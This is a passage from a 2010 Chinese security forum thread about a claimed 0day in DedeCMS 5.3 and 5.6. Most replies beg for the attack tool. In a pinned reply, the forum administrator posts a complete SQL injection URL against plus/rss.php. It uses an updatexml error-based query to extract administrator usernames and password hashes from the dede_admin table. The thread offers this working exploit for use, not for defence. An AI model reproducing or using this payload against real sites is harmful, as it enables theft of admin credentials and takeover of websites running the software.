上一主题下一主题

«12 3 »Pages: 1/3 Go

主题 : DEDE 5.3、5.6最新注入漏洞通杀0day

使用道具┊复制链接┊浏览器收藏┊打印

y35u离线

级别: 荣誉嘉宾

UID: 3549
精华: 0
发帖: 9
安全币: 290 枚
威望: 13 点
贡献值: 13 点
红科币: 19 枚
好评度: 13 点
在线时间: 25(时)
注册时间: 2010-07-22
最后登录: 2010-07-23

楼主发表于: 2010-07-23 19:46

倒序阅读 ┊ 只看楼主 ┊ 小中大

DEDE 5.3、5.6最新注入漏洞通杀0day

管理提醒: 本帖被 amxking 执行提前操作(2010-08-04)

先来个预报，大家注意注意，admin5刚被日，威力很大啊

请关闭会员注册，会员中心存在getshell漏洞。

关键词: 漏洞 0day 注入漏洞注入 getshell

回复引用

举报顶端

amxking在线

Information Security

级别: 管理员

UID: 3
精华: 46
发帖: 2974
安全币: 419693 枚
威望: 5620 点
贡献值: 5500 点
红科币: 287234 枚
好评度: 5610 点
在线时间: 2204(时)
注册时间: 2009-12-21
最后登录: 2010-09-08

置顶来自17楼发表于: 2010-08-02 13:47

只看该作者 ┊ 小中大

Amxking:我来揭露下好了，是个注入的0day ，代码如下：

复制代码

plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

In me the tiger sniffe the rose !帮助别人就是帮助自己!

回复引用

举报顶端

了无痕在线

级别: 区版主

UID: 96
精华: 2
发帖: 305
安全币: 169032 枚
威望: 1355 点
贡献值: 1567 点
红科币: 115 枚
好评度: 1454 点
在线时间: 451(时)
注册时间: 2009-12-23
最后登录: 2010-09-08

沙发发表于: 2010-07-23 20:26

只看该作者 ┊ 小中大

我殷切的希望能把工具贴出来

回复引用

举报顶端

yangcan在线

级别: 助理安全工程师

UID: 2161
精华: 0
发帖: 18
安全币: 235 枚
威望: 19 点
贡献值: 19 点
红科币: 24 枚
好评度: 19 点
在线时间: 1601(时)
注册时间: 2010-05-13
最后登录: 2010-09-07

板凳发表于: 2010-07-23 21:20

只看该作者 ┊ 小中大

....又是等别人玩烂了才公布

回复引用

举报顶端

玷点在线

级别: 助理安全工程师

UID: 2221
精华: 0
发帖: 62
安全币: 555 枚
威望: 66 点
贡献值: 65 点
红科币: 72 枚
好评度: 66 点
在线时间: 262(时)
注册时间: 2010-05-27
最后登录: 2010-09-07

地板发表于: 2010-07-23 21:25

只看该作者 ┊ 小中大

工具丢出来撒。。？

回复引用

举报顶端

神猪公子离线

级别: 助理安全工程师

UID: 91
精华: 0
发帖: 106
安全币: 3197 枚
威望: 142 点
贡献值: 140 点
红科币: 364 枚
好评度: 142 点
在线时间: 910(时)
注册时间: 2009-12-22
最后登录: 2010-09-07

4楼发表于: 2010-07-23 21:39

只看该作者 ┊ 小中大

技术性文章在哪里呀？

回复引用

举报顶端

飞扬在线

级别: 助理安全工程师

UID: 1169
精华: 0
发帖: 10
安全币: 1406 枚
威望: 25 点
贡献值: 25 点
红科币: 246 枚
好评度: 25 点
在线时间: 363(时)
注册时间: 2010-02-03
最后登录: 2010-09-07

5楼发表于: 2010-07-23 22:18

只看该作者 ┊ 小中大

看来大牛们玩够了才扔

回复引用

举报顶端

timi在线

接软件制作单子.加QQ275906845

级别: 区版主

UID: 85
精华: 4
发帖: 1118
安全币: 98 枚
威望: 3259 点
贡献值: 3064 点
红科币: 38216 枚
好评度: 2271 点
在线时间: 3456(时)
注册时间: 2009-12-22
最后登录: 2010-09-08

6楼发表于: 2010-07-23 23:49

只看该作者 ┊ 小中大

嘿嘿不错啊

接软件制作单子.加QQ275906845

回复引用

举报顶端

诱惑.cc在线

级别: 荣誉嘉宾

UID: 185
精华: 0
发帖: 239
安全币: 624 枚
威望: 279 点
贡献值: 276 点
红科币: 342 枚
好评度: 279 点
在线时间: 233(时)
注册时间: 2009-12-29
最后登录: 2010-09-08

7楼发表于: 2010-07-24 00:13

只看该作者 ┊ 小中大

没多大兴趣想知道。。

回复引用

举报顶端

it民工离线

级别: 助理安全工程师

UID: 478
精华: 0
发帖: 23
安全币: 1632 枚
威望: 41 点
贡献值: 41 点
红科币: 252 枚
好评度: 41 点
在线时间: 167(时)
注册时间: 2010-01-14
最后登录: 2010-09-05

8楼发表于: 2010-07-24 06:38

只看该作者 ┊ 小中大

我来打酱油

回复引用

举报顶端

上一主题下一主题

«12 3 »Pages: 1/3 Go

红科网安信息安全团队-〓A.K.T〓 » 最新漏洞{New Vulnerabilities}

http://bbs.honkwin.com
访问内容超出本站范围，不能确定是否安全
继续访问	取消访问

快速回复
	限 100 字节批量上传需要先选择文件，再选择上传进入高级模式加粗字体颜色背景颜色插入链接图片验证问题: 我们的组织是? 正确答案:红科网安按"Ctrl+Enter"直接提交	上一个下一个